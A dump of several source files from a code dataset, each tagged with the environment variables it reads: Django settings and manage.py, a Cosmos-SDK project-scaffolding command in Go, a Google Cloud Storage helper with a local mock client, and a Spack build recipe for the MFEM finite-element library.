'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_extensions',
'rest_framework',
'silk',
'users.apps.UsersConfig',
'data_api.apps.DataApiConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'silk.middleware.SilkyMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'backend.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'backend.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.BasicAuthentication',
'rest_framework.authentication.SessionAuthentication',
),
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 10
}
| []
| []
| [
"SECRET_KEY"
]
| [] | ["SECRET_KEY"] | python | 1 | 0 | |
manage.py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "MyFirstSite.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| []
| []
| []
| [] | [] | python | 0 | 0 | |
cmd/cosmos-sdk-cli/cmd/init.go | package cmd
import (
"fmt"
"go/build"
"io/ioutil"
"os"
"strings"
"github.com/cosmos/cosmos-sdk/version"
"github.com/spf13/cobra"
tmversion "github.com/tendermint/tendermint/version"
"path/filepath"
)
var remoteBasecoinPath = "github.com/cosmos/cosmos-sdk/examples/basecoin"
// Replacer to replace all instances of basecoin/basecli/BasecoinApp to project specific names
// Gets initialized when initCmd is executing after getting the project name from user
var replacer *strings.Replacer
// Remote path for the project.
var remoteProjectPath string
func init() {
initCmd.Flags().StringVarP(&remoteProjectPath, "project-path", "p", "", "Remote project path. eg: github.com/your_user_name/project_name")
rootCmd.AddCommand(initCmd)
}
var initCmd = &cobra.Command{
Use: "init [ProjectName]",
Short: "Initialize your new cosmos zone",
Args: cobra.ExactArgs(1),
RunE: func(cmd *cobra.Command, args []string) error {
fmt.Print("Thanks for choosing Cosmos-SDK to build your project.\n\n")
projectName := args[0]
capitalizedProjectName := strings.Title(projectName)
shortProjectName := strings.ToLower(projectName)
remoteProjectPath = strings.ToLower(strings.TrimSpace(remoteProjectPath))
if remoteProjectPath == "" {
remoteProjectPath = strings.ToLower(shortProjectName)
}
replacer = strings.NewReplacer("basecli", shortProjectName+"cli",
"basecoind", shortProjectName+"d",
"BasecoinApp", capitalizedProjectName+"App",
remoteBasecoinPath, remoteProjectPath,
"basecoin", shortProjectName,
"Basecoin", capitalizedProjectName)
return setupBasecoinWorkspace(shortProjectName, remoteProjectPath)
},
}
func resolveProjectPath(remoteProjectPath string) string {
gopath := os.Getenv("GOPATH")
if gopath == "" {
gopath = build.Default.GOPATH
// Use $HOME/go
}
return gopath + string(os.PathSeparator) + "src" + string(os.PathSeparator) + remoteProjectPath
}
func copyBasecoinTemplate(projectName string, projectPath string, remoteProjectPath string) {
basecoinProjectPath := resolveProjectPath(remoteBasecoinPath)
filepath.Walk(basecoinProjectPath, func(path string, f os.FileInfo, err error) error {
if !f.IsDir() {
data, err := ioutil.ReadFile(path)
if err != nil {
return err
}
contents := string(data)
// Extract relative file path eg: app/app.go instead of /Users/..../github.com/cosmos/...examples/basecoin/app/app.go
relativeFilePath := path[len(basecoinProjectPath)+1:]
// Evaluating the filepath in the new project folder
projectFilePath := projectPath + string(os.PathSeparator) + relativeFilePath
projectFilePath = replacer.Replace(projectFilePath)
lengthOfRootDir := strings.LastIndex(projectFilePath, string(os.PathSeparator))
// Extracting the path of root directory from the filepath
rootDir := projectFilePath[0:lengthOfRootDir]
// Creating the required directory first
os.MkdirAll(rootDir, os.ModePerm)
fmt.Println("Creating " + projectFilePath)
// Writing the contents to a file in the project folder
contents = replacer.Replace(contents)
ioutil.WriteFile(projectFilePath, []byte(contents), os.ModePerm)
}
return nil
})
}
func createGopkg(projectPath string) {
// Create gopkg.toml file
dependencies := map[string]string{
"github.com/cosmos/cosmos-sdk": "=" + version.Version,
"github.com/stretchr/testify": "=1.2.1",
"github.com/spf13/cobra": "=0.0.1",
"github.com/spf13/viper": "=1.0.0",
}
overrides := map[string]string{
"github.com/golang/protobuf": "1.1.0",
"github.com/tendermint/tendermint": tmversion.Version,
}
contents := ""
for dependency, version := range dependencies {
contents += "[[constraint]]\n\tname = \"" + dependency + "\"\n\tversion = \"" + version + "\"\n\n"
}
for dependency, version := range overrides {
contents += "[[override]]\n\tname = \"" + dependency + "\"\n\tversion = \"=" + version + "\"\n\n"
}
contents += "[prune]\n\tgo-tests = true\n\tunused-packages = true"
ioutil.WriteFile(projectPath+"/Gopkg.toml", []byte(contents), os.ModePerm)
}
func createMakefile(projectPath string) {
// Create makefile
// TODO: Should we use tools/ directory as in Cosmos-SDK to get tools for linting etc.
makefileContents := `PACKAGES=$(shell go list ./... | grep -v '/vendor/')
all: get_tools get_vendor_deps build test
get_tools:
go get github.com/golang/dep/cmd/dep
build:
go build -o bin/basecli cmd/basecli/main.go && go build -o bin/basecoind cmd/basecoind/main.go
get_vendor_deps:
@rm -rf vendor/
@dep ensure
test:
@go test $(PACKAGES)
benchmark:
@go test -bench=. $(PACKAGES)
.PHONY: all build test benchmark`
// Replacing instances of base* to project specific names
makefileContents = replacer.Replace(makefileContents)
ioutil.WriteFile(projectPath+"/Makefile", []byte(makefileContents), os.ModePerm)
}
func setupBasecoinWorkspace(projectName string, remoteProjectPath string) error {
projectPath := resolveProjectPath(remoteProjectPath)
fmt.Println("Configuring your project in " + projectPath)
// Check if the projectPath already exists or not
if _, err := os.Stat(projectPath); !os.IsNotExist(err) {
return fmt.Errorf("Unable to initialize the project. %s already exists", projectPath)
}
copyBasecoinTemplate(projectName, projectPath, remoteProjectPath)
createGopkg(projectPath)
createMakefile(projectPath)
fmt.Printf("Initialized a new project at %s.\nHappy hacking!\n", projectPath)
return nil
}
| [
"\"GOPATH\""
]
| []
| [
"GOPATH"
]
| [] | ["GOPATH"] | go | 1 | 0 | |
api/app/utils/storage.py | """Utilities for interaction with Google Cloud Storage, and a mock version of it for loal development."""
from google.cloud import storage
from google.oauth2 import service_account
from google.auth.credentials import AnonymousCredentials
from google.api_core.client_options import ClientOptions
from config import GCP_CREDENTIALS_DICT, GCP_PROJECT_NAME, GCP_BUCKET_NAME
import requests
import urllib3
import os
from app import LOGGER
def _create_dummy_storage_client():
fake_host = os.getenv('STORAGE_PORT_4443_TCP_ADDR')
external_url = 'https://{}:4443'.format(fake_host)
storage.blob._API_ACCESS_ENDPOINT = 'https://storage.gcs.{}.nip.io:4443'.format(fake_host)
storage.blob._DOWNLOAD_URL_TEMPLATE = (
u"%s/download/storage/v1{path}?alt=media" % external_url
)
storage.blob._BASE_UPLOAD_TEMPLATE = (
u"%s/upload/storage/v1{bucket_path}/o?uploadType=" % external_url
)
storage.blob._MULTIPART_URL_TEMPLATE = storage.blob._BASE_UPLOAD_TEMPLATE + u"multipart"
storage.blob._RESUMABLE_URL_TEMPLATE = storage.blob._BASE_UPLOAD_TEMPLATE + u"resumable"
my_http = requests.Session()
my_http.verify = False # disable SSL validation
urllib3.disable_warnings(
urllib3.exceptions.InsecureRequestWarning
) # disable https warnings for https insecure certs
storage_client = storage.Client(
credentials=AnonymousCredentials(),
project='test',
_http=my_http,
client_options=ClientOptions(api_endpoint=external_url))
if len(list(storage_client.list_buckets())) == 0:
bucket = storage_client.create_bucket(_get_bucket_name())
return storage_client
def _create_real_storage_client():
if GCP_CREDENTIALS_DICT['private_key'] == 'dummy':
# Running on GCP, so no credentials needed
storage_client = storage.Client(project=GCP_PROJECT_NAME)
else:
# Create credentials to access from anywhere
credentials = service_account.Credentials.from_service_account_info(
GCP_CREDENTIALS_DICT
)
storage_client = storage.Client(credentials=credentials, project=GCP_PROJECT_NAME)
return storage_client
def _get_bucket_name():
return 'LocalBucket' if GCP_BUCKET_NAME == '__filler__' else GCP_BUCKET_NAME
def _get_storage_bucket(storage_client):
return storage_client.get_bucket(_get_bucket_name())
def get_storage_bucket():
if GCP_CREDENTIALS_DICT['private_key'] == '__filler__':
LOGGER.debug('Setting dummy storage client')
storage_client = _create_dummy_storage_client()
else:
LOGGER.debug('Setting GCP storage client')
storage_client = _create_real_storage_client()
return _get_storage_bucket(storage_client)
| []
| []
| [
"STORAGE_PORT_4443_TCP_ADDR"
]
| [] | ["STORAGE_PORT_4443_TCP_ADDR"] | python | 1 | 0 | |
scripts/spack/packages/mfem/package.py | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import os
import shutil
import sys
from spack import *
class Mfem(Package, CudaPackage, ROCmPackage):
"""Free, lightweight, scalable C++ library for finite element methods."""
tags = ['fem', 'finite-elements', 'high-order', 'amr', 'hpc', 'radiuss', 'e4s']
homepage = 'http://www.mfem.org'
git = 'https://github.com/mfem/mfem.git'
maintainers = ['v-dobrev', 'tzanio', 'acfisher',
'goxberry', 'markcmiller86']
test_requires_compiler = True
# Recommended mfem builds to test when updating this file: see the shell
# script 'test_builds.sh' in the same directory as this file.
# mfem is downloaded from a URL shortener at request of upstream
# author Tzanio Kolev <[email protected]>. See here:
# https://github.com/mfem/mfem/issues/53
#
# The following procedure should be used to verify security when a
# new version is added:
#
# 1. Verify that no checksums on old versions have changed.
#
# 2. Verify that the shortened URL for the new version is listed at:
# https://mfem.org/download/
#
# 3. Use http://getlinkinfo.com or similar to verify that the
# underling download link for the latest version comes has the
# prefix: http://mfem.github.io/releases
#
# If this quick verification procedure fails, additional discussion
# will be required to verify the new version.
# 'develop' is a special version that is always larger (or newer) than any
# other version.
version('develop', branch='master')
# SERAC EDIT BEGIN
# Note: we have a `serac-dev` branch on mfem's github that we track pending changes.
# Make sure this sha coincides with the git submodule
version('4.3.0serac', commit='e55e90e8d0e331bba3fbe20a98a9f9b12453700b', submodules="True")
# SERAC EDIT END
version('4.3.0',
sha256='3a495602121b986049286ea0b23512279cdbdfb43c15c42a1511b521051fbe38',
url='https://bit.ly/mfem-4-3', extension='tar.gz')
version('4.2.0',
'4352a225b55948d2e73a5ee88cece0e88bdbe7ba6726a23d68b2736d3221a86d',
url='https://bit.ly/mfem-4-2', extension='tar.gz')
version('4.1.0',
'4c83fdcf083f8e2f5b37200a755db843cdb858811e25a8486ad36b2cbec0e11d',
url='https://bit.ly/mfem-4-1', extension='tar.gz')
# Tagged development version used by xSDK
version('4.0.1-xsdk', commit='c55c80d17b82d80de04b849dd526e17044f8c99a')
version('4.0.0',
'df5bdac798ea84a263979f6fbf79de9013e1c55562f95f98644c3edcacfbc727',
url='https://bit.ly/mfem-4-0', extension='tar.gz')
# Tagged development version used by the laghos package:
version('3.4.1-laghos-v2.0', tag='laghos-v2.0')
version('3.4.0',
sha256='4e73e4fe0482636de3c5dc983cd395839a83cb16f6f509bd88b053e8b3858e05',
url='https://bit.ly/mfem-3-4', extension='tar.gz')
version('3.3.2',
sha256='b70fa3c5080b9ec514fc05f4a04ff74322b99ac4ecd6d99c229f0ed5188fc0ce',
url='https://goo.gl/Kd7Jk8', extension='tar.gz')
# Tagged development version used by the laghos package:
version('3.3.1-laghos-v1.0', tag='laghos-v1.0')
version('3.3',
sha256='b17bd452593aada93dc0fee748fcfbbf4f04ce3e7d77fdd0341cc9103bcacd0b',
url='http://goo.gl/Vrpsns', extension='tar.gz')
version('3.2',
sha256='2938c3deed4ec4f7fd5b5f5cfe656845282e86e2dcd477d292390058b7b94340',
url='http://goo.gl/Y9T75B', extension='tar.gz')
version('3.1',
sha256='841ea5cf58de6fae4de0f553b0e01ebaab9cd9c67fa821e8a715666ecf18fc57',
url='http://goo.gl/xrScXn', extension='tar.gz')
variant('static', default=True,
description='Build static library')
variant('shared', default=False,
description='Build shared library')
variant('mpi', default=True,
description='Enable MPI parallelism')
# Can we make the default value for 'metis' to depend on the 'mpi' value?
variant('metis', default=True,
description='Enable METIS support')
variant('openmp', default=False,
description='Enable OpenMP parallelism')
# Note: '+cuda' and 'cuda_arch' variants are added by the CudaPackage
# Note: '+rocm' and 'amdgpu_target' variants are added by the ROCmPackage
variant('occa', default=False, description='Enable OCCA backend')
variant('raja', default=False, description='Enable RAJA backend')
variant('libceed', default=False, description='Enable libCEED backend')
variant('umpire', default=False, description='Enable Umpire support')
variant('amgx', default=False, description='Enable NVIDIA AmgX solver support')
variant('threadsafe', default=False,
description=('Enable thread safe features.'
' Required for OpenMP.'
' May cause minor performance issues.'))
variant('superlu-dist', default=False,
description='Enable MPI parallel, sparse direct solvers')
variant('strumpack', default=False,
description='Enable support for STRUMPACK')
variant('suite-sparse', default=False,
description='Enable serial, sparse direct solvers')
variant('petsc', default=False,
description='Enable PETSc solvers, preconditioners, etc.')
variant('slepc', default=False,
description='Enable SLEPc integration')
variant('sundials', default=False,
description='Enable Sundials time integrators')
variant('pumi', default=False,
description='Enable functionality based on PUMI')
variant('gslib', default=False,
description='Enable functionality based on GSLIB')
variant('mpfr', default=False,
description='Enable precise, 1D quadrature rules')
variant('lapack', default=False,
description='Use external blas/lapack routines')
variant('debug', default=False,
description='Build debug instead of optimized version')
variant('netcdf', default=False,
description='Enable Cubit/Genesis reader')
variant('conduit', default=False,
description='Enable binary data I/O using Conduit')
variant('zlib', default=True,
description='Support zip\'d streams for I/O')
variant('gnutls', default=False,
description='Enable secure sockets using GnuTLS')
variant('libunwind', default=False,
description='Enable backtrace on error support using Libunwind')
# TODO: SIMD, Ginkgo, ADIOS2, HiOp, MKL CPardiso, Axom/Sidre
variant('timer', default='auto',
values=('auto', 'std', 'posix', 'mac', 'mpi'),
description='Timing functions to use in mfem::StopWatch')
variant('examples', default=False,
description='Build and install examples')
variant('miniapps', default=False,
description='Build and install miniapps')
conflicts('+shared', when='@:3.3.2')
conflicts('~static~shared')
conflicts('~threadsafe', when='@:3+openmp')
conflicts('+cuda', when='@:3')
conflicts('+rocm', when='@:4.1')
conflicts('+cuda+rocm')
conflicts('+netcdf', when='@:3.1')
conflicts('+superlu-dist', when='@:3.1')
# STRUMPACK support was added in mfem v3.3.2, however, here we allow only
# strumpack v3+ support for which is available starting with mfem v4.0:
conflicts('+strumpack', when='@:3')
conflicts('+gnutls', when='@:3.1')
conflicts('+zlib', when='@:3.2')
conflicts('+mpfr', when='@:3.2')
conflicts('+petsc', when='@:3.2')
conflicts('+slepc', when='@:4.1')
conflicts('+sundials', when='@:3.2')
conflicts('+pumi', when='@:3.3.2')
conflicts('+gslib', when='@:4.0')
conflicts('timer=mac', when='@:3.3.0')
conflicts('timer=mpi', when='@:3.3.0')
conflicts('~metis+mpi', when='@:3.3.0')
conflicts('+metis~mpi', when='@:3.3.0')
conflicts('+conduit', when='@:3.3.2')
conflicts('+occa', when='mfem@:3')
conflicts('+raja', when='mfem@:3')
conflicts('+libceed', when='mfem@:4.0')
conflicts('+umpire', when='mfem@:4.0')
conflicts('+amgx', when='mfem@:4.1')
conflicts('+amgx', when='~cuda')
conflicts('+mpi~cuda ^hypre+cuda')
conflicts('+superlu-dist', when='~mpi')
conflicts('+strumpack', when='~mpi')
conflicts('+petsc', when='~mpi')
conflicts('+slepc', when='~petsc')
conflicts('+pumi', when='~mpi')
conflicts('timer=mpi', when='~mpi')
depends_on('mpi', when='+mpi')
depends_on('[email protected]:2.13', when='@:3.3+mpi')
depends_on('hypre@:2.20.0', when='@3.4:4.2+mpi')
depends_on('hypre@:2.23.0', when='@4.3.0+mpi')
depends_on('hypre', when='+mpi')
depends_on('metis', when='+metis')
depends_on('blas', when='+lapack')
depends_on('[email protected]:', when='+lapack')
depends_on('[email protected]', when='@:3.3.0+sundials~mpi')
depends_on('[email protected]+mpi+hypre', when='@:3.3.0+sundials+mpi')
depends_on('[email protected]:', when='@3.3.2:+sundials~mpi')
depends_on('[email protected]:+mpi+hypre', when='@3.3.2:+sundials+mpi')
depends_on('[email protected]:', when='@4.0.1-xsdk:+sundials~mpi')
depends_on('[email protected]:+mpi+hypre', when='@4.0.1-xsdk:+sundials+mpi')
for sm_ in CudaPackage.cuda_arch_values:
depends_on('[email protected]:+cuda cuda_arch={0}'.format(sm_),
when='@4.2.0:+sundials+cuda cuda_arch={0}'.format(sm_))
depends_on('[email protected]:', when='@4.2.0:+pumi')
depends_on('pumi', when='+pumi~shared')
depends_on('pumi+shared', when='+pumi+shared')
depends_on('[email protected]:+mpi', when='+gslib+mpi')
depends_on('[email protected]:~mpi~mpiio', when='+gslib~mpi')
depends_on('suite-sparse', when='+suite-sparse')
depends_on('superlu-dist', when='+superlu-dist')
depends_on('[email protected]:', when='+strumpack~shared')
depends_on('[email protected]:+shared', when='+strumpack+shared')
for sm_ in CudaPackage.cuda_arch_values:
depends_on('strumpack+cuda cuda_arch={0}'.format(sm_),
when='+strumpack+cuda cuda_arch={0}'.format(sm_))
# The PETSc tests in MFEM will fail if PETSc is not configured with
# SuiteSparse and MUMPS. On the other hand, if we require the variants
# '+suite-sparse+mumps' of PETSc, the xsdk package concretization fails.
depends_on('[email protected]:+mpi+double+hypre', when='+petsc')
depends_on('[email protected]:', when='+slepc')
# Recommended when building outside of xsdk:
# depends_on('[email protected]:+mpi+double+hypre+suite-sparse+mumps',
# when='+petsc')
depends_on('mpfr', when='+mpfr')
depends_on('[email protected]:', when='+netcdf')
depends_on('unwind', when='+libunwind')
depends_on('zlib', when='+zlib')
depends_on('gnutls', when='+gnutls')
depends_on('[email protected]:,master:', when='+conduit')
depends_on('conduit+mpi', when='+conduit+mpi')
# The MFEM 4.0.0 SuperLU interface fails when using [email protected] and
# [email protected]. See https://github.com/mfem/mfem/issues/983.
# This issue was resolved in v4.1.
conflicts('+superlu-dist',
when='mfem@:4.0 ^[email protected]: ^superlu-dist@6:')
# The STRUMPACK v3 interface in MFEM seems to be broken as of MFEM v4.1
# when using hypre version >= 2.16.0.
# This issue is resolved in v4.2.
conflicts('+strumpack', when='[email protected]:4.1 ^[email protected]:')
conflicts('+strumpack ^strumpack+cuda', when='~cuda')
depends_on('[email protected]:', when='@:4.1+occa')
depends_on('[email protected]:', when='@4.2.0:+occa')
depends_on('occa+cuda', when='+occa+cuda')
# TODO: propagate '+rocm' variant to occa when it is supported
depends_on('[email protected]:', when='@4.0.1:+raja')
depends_on('[email protected]:0.9.0', when='@4.0.0+raja')
for sm_ in CudaPackage.cuda_arch_values:
depends_on('raja+cuda cuda_arch={0}'.format(sm_),
when='+raja+cuda cuda_arch={0}'.format(sm_))
for gfx in ROCmPackage.amdgpu_targets:
depends_on('raja+rocm amdgpu_target={0}'.format(gfx),
when='+raja+rocm amdgpu_target={0}'.format(gfx))
depends_on('[email protected]:', when='@:4.1+libceed')
depends_on('[email protected]:', when='@4.2.0:+libceed')
for sm_ in CudaPackage.cuda_arch_values:
depends_on('libceed+cuda cuda_arch={0}'.format(sm_),
when='+libceed+cuda cuda_arch={0}'.format(sm_))
for gfx in ROCmPackage.amdgpu_targets:
depends_on('libceed+rocm amdgpu_target={0}'.format(gfx),
when='+libceed+rocm amdgpu_target={0}'.format(gfx))
depends_on('[email protected]:', when='+umpire')
for sm_ in CudaPackage.cuda_arch_values:
depends_on('umpire+cuda cuda_arch={0}'.format(sm_),
when='+umpire+cuda cuda_arch={0}'.format(sm_))
for gfx in ROCmPackage.amdgpu_targets:
depends_on('umpire+rocm amdgpu_target={0}'.format(gfx),
when='+umpire+rocm amdgpu_target={0}'.format(gfx))
# AmgX: propagate the cuda_arch and mpi settings:
for sm_ in CudaPackage.cuda_arch_values:
depends_on('amgx+mpi cuda_arch={0}'.format(sm_),
when='+amgx+mpi cuda_arch={0}'.format(sm_))
depends_on('amgx~mpi cuda_arch={0}'.format(sm_),
when='+amgx~mpi cuda_arch={0}'.format(sm_))
patch('mfem_ppc_build.patch', when='@3.2:3.3.0 arch=ppc64le')
patch('mfem-3.4.patch', when='@3.4.0')
patch('mfem-3.3-3.4-petsc-3.9.patch',
when='@3.3.0:3.4.0 +petsc ^[email protected]:')
patch('mfem-4.2-umpire.patch', when='@4.2.0+umpire')
patch('mfem-4.2-slepc.patch', when='@4.2.0+slepc')
patch('mfem-4.2-petsc-3.15.0.patch', when='@4.2.0+petsc ^[email protected]:')
# SERAC EDIT BEGIN
# Our version of mfem has these patches already
#patch('mfem-4.3-hypre-2.23.0.patch', when='@4.3.0')
#patch('mfem-4.3-cusparse-11.4.patch', when='@4.3.0+cuda')
# SERAC EDIT END
# Patch to fix MFEM makefile syntax error. See
# https://github.com/mfem/mfem/issues/1042 for the bug report and
# https://github.com/mfem/mfem/pull/1043 for the bugfix contributed
# upstream.
patch('mfem-4.0.0-makefile-syntax-fix.patch', when='@4.0.0')
phases = ['configure', 'build', 'install']
def setup_build_environment(self, env):
env.unset('MFEM_DIR')
env.unset('MFEM_BUILD_DIR')
#
# Note: Although MFEM does support CMake configuration, MFEM
# development team indicates that vanilla GNU Make is the
# preferred mode of configuration of MFEM and the mode most
# likely to be up to date in supporting *all* of MFEM's
# configuration options. So, don't use CMake
#
def configure(self, spec, prefix):
def yes_no(varstr):
return 'YES' if varstr in self.spec else 'NO'
# See also find_system_libraries in lib/spack/llnl/util/filesystem.py
# where the same list of paths is used.
sys_lib_paths = [
'/lib64',
'/lib',
'/usr/lib64',
'/usr/lib',
'/usr/local/lib64',
'/usr/local/lib']
def is_sys_lib_path(dir):
return dir in sys_lib_paths
xcompiler = ''
xlinker = '-Wl,'
if '+cuda' in spec:
xcompiler = '-Xcompiler='
# SERAC EDIT BEGIN - Xlinker fix 1/3 - better way? upstream?
xlinker = '-Xlinker '
# SERAC EDIT END
cuda_arch = None if '~cuda' in spec else spec.variants['cuda_arch'].value
# We need to add rpaths explicitly to allow proper export of link flags
# from within MFEM.
# Similar to spec[pkg].libs.ld_flags but prepends rpath flags too.
# Also does not add system library paths as defined by 'sys_lib_paths'
# above -- this is done to avoid issues like this:
# https://github.com/mfem/mfem/issues/1088.
def ld_flags_from_library_list(libs_list):
# SERAC EDIT BEGIN - Xlinker fix 2/3
flags = ['%s-rpath %s%s' % (xlinker, xlinker, dir)
for dir in libs_list.directories
if not is_sys_lib_path(dir)]
# SERAC EDIT END
flags += ['-L%s' % dir for dir in libs_list.directories
if not is_sys_lib_path(dir)]
flags += [libs_list.link_flags]
return ' '.join(flags)
def ld_flags_from_dirs(pkg_dirs_list, pkg_libs_list):
# SERAC EDIT BEGIN - Xlinker fix 3/3
flags = ['%s-rpath %s%s' % (xlinker, xlinker, dir) for dir in pkg_dirs_list
if not is_sys_lib_path(dir)]
# SERAC EDIT END
flags += ['-L%s' % dir for dir in pkg_dirs_list
if not is_sys_lib_path(dir)]
flags += ['-l%s' % lib for lib in pkg_libs_list]
return ' '.join(flags)
def find_optional_library(name, prefix):
for shared in [True, False]:
for path in ['lib64', 'lib']:
lib = find_libraries(name, join_path(prefix, path),
shared=shared, recursive=False)
if lib:
return lib
return LibraryList([])
# Determine how to run MPI tests, e.g. when using '--test=root', when
# Spack is run inside a batch system job.
mfem_mpiexec = 'mpirun'
mfem_mpiexec_np = '-np'
if 'SLURM_JOBID' in os.environ:
mfem_mpiexec = 'srun'
mfem_mpiexec_np = '-n'
elif 'LSB_JOBID' in os.environ:
if 'LLNL_COMPUTE_NODES' in os.environ:
mfem_mpiexec = 'lrun'
mfem_mpiexec_np = '-n'
else:
mfem_mpiexec = 'jsrun'
mfem_mpiexec_np = '-p'
metis5_str = 'NO'
if ('+metis' in spec) and spec['metis'].satisfies('@5:'):
metis5_str = 'YES'
zlib_var = 'MFEM_USE_ZLIB' if (spec.satisfies('@4.1.0:')) else \
'MFEM_USE_GZSTREAM'
options = [
'PREFIX=%s' % prefix,
'MFEM_USE_MEMALLOC=YES',
'MFEM_DEBUG=%s' % yes_no('+debug'),
# NOTE: env['CXX'] is the spack c++ compiler wrapper. The real
# compiler is defined by env['SPACK_CXX'].
'CXX=%s' % env['CXX'],
'MFEM_USE_LIBUNWIND=%s' % yes_no('+libunwind'),
'%s=%s' % (zlib_var, yes_no('+zlib')),
'MFEM_USE_METIS=%s' % yes_no('+metis'),
'MFEM_USE_METIS_5=%s' % metis5_str,
'MFEM_THREAD_SAFE=%s' % yes_no('+threadsafe'),
'MFEM_USE_MPI=%s' % yes_no('+mpi'),
'MFEM_USE_LAPACK=%s' % yes_no('+lapack'),
'MFEM_USE_SUPERLU=%s' % yes_no('+superlu-dist'),
'MFEM_USE_STRUMPACK=%s' % yes_no('+strumpack'),
'MFEM_USE_SUITESPARSE=%s' % yes_no('+suite-sparse'),
'MFEM_USE_SUNDIALS=%s' % yes_no('+sundials'),
'MFEM_USE_PETSC=%s' % yes_no('+petsc'),
'MFEM_USE_SLEPC=%s' % yes_no('+slepc'),
'MFEM_USE_PUMI=%s' % yes_no('+pumi'),
'MFEM_USE_GSLIB=%s' % yes_no('+gslib'),
'MFEM_USE_NETCDF=%s' % yes_no('+netcdf'),
'MFEM_USE_MPFR=%s' % yes_no('+mpfr'),
'MFEM_USE_GNUTLS=%s' % yes_no('+gnutls'),
'MFEM_USE_OPENMP=%s' % yes_no('+openmp'),
'MFEM_USE_CONDUIT=%s' % yes_no('+conduit'),
'MFEM_USE_CUDA=%s' % yes_no('+cuda'),
'MFEM_USE_HIP=%s' % yes_no('+rocm'),
'MFEM_USE_OCCA=%s' % yes_no('+occa'),
'MFEM_USE_RAJA=%s' % yes_no('+raja'),
'MFEM_USE_AMGX=%s' % yes_no('+amgx'),
'MFEM_USE_CEED=%s' % yes_no('+libceed'),
'MFEM_USE_UMPIRE=%s' % yes_no('+umpire'),
'MFEM_MPIEXEC=%s' % mfem_mpiexec,
'MFEM_MPIEXEC_NP=%s' % mfem_mpiexec_np]
cxxflags = spec.compiler_flags['cxxflags']
if cxxflags:
# Add opt/debug flags if they are not present in global cxx flags
opt_flag_found = any(f in self.compiler.opt_flags
for f in cxxflags)
debug_flag_found = any(f in self.compiler.debug_flags
for f in cxxflags)
if '+debug' in spec:
if not debug_flag_found:
cxxflags.append('-g')
if not opt_flag_found:
cxxflags.append('-O0')
else:
if not opt_flag_found:
cxxflags.append('-O2')
cxxflags = [(xcompiler + flag) for flag in cxxflags]
if '+cuda' in spec:
cxxflags += [
'-x=cu --expt-extended-lambda -arch=sm_%s' % cuda_arch,
'-ccbin %s' % (spec['mpi'].mpicxx if '+mpi' in spec
else env['CXX'])]
if self.spec.satisfies('@4.0.0:'):
cxxflags.append(self.compiler.cxx11_flag)
# The cxxflags are set by the spack c++ compiler wrapper. We also
# set CXXFLAGS explicitly, for clarity, and to properly export the
# cxxflags in the variable MFEM_CXXFLAGS in config.mk.
options += ['CXXFLAGS=%s' % ' '.join(cxxflags)]
if '~static' in spec:
options += ['STATIC=NO']
if '+shared' in spec:
options += [
'SHARED=YES',
'PICFLAG=%s' % (xcompiler + self.compiler.cxx_pic_flag)]
if '+mpi' in spec:
options += ['MPICXX=%s' % spec['mpi'].mpicxx]
hypre = spec['hypre']
# The hypre package always links with 'blas' and 'lapack'.
all_hypre_libs = hypre.libs + hypre['lapack'].libs + \
hypre['blas'].libs
options += [
'HYPRE_OPT=-I%s' % hypre.prefix.include,
'HYPRE_LIB=%s' % ld_flags_from_library_list(all_hypre_libs)]
if '+metis' in spec:
options += [
'METIS_OPT=-I%s' % spec['metis'].prefix.include,
'METIS_LIB=%s' %
ld_flags_from_library_list(spec['metis'].libs)]
if '+lapack' in spec:
lapack_blas = spec['lapack'].libs + spec['blas'].libs
options += [
# LAPACK_OPT is not used
'LAPACK_LIB=%s' % ld_flags_from_library_list(lapack_blas)]
if '+superlu-dist' in spec:
lapack_blas = spec['lapack'].libs + spec['blas'].libs
options += [
'SUPERLU_OPT=-I%s -I%s' %
(spec['superlu-dist'].prefix.include,
spec['parmetis'].prefix.include),
'SUPERLU_LIB=%s %s' %
(ld_flags_from_dirs([spec['superlu-dist'].prefix.lib,
spec['parmetis'].prefix.lib],
['superlu_dist', 'parmetis']),
ld_flags_from_library_list(lapack_blas))]
if '+strumpack' in spec:
strumpack = spec['strumpack']
sp_opt = ['-I%s' % strumpack.prefix.include]
sp_lib = [ld_flags_from_library_list(strumpack.libs)]
# Parts of STRUMPACK use fortran, so we need to link with the
# fortran library and also the MPI fortran library:
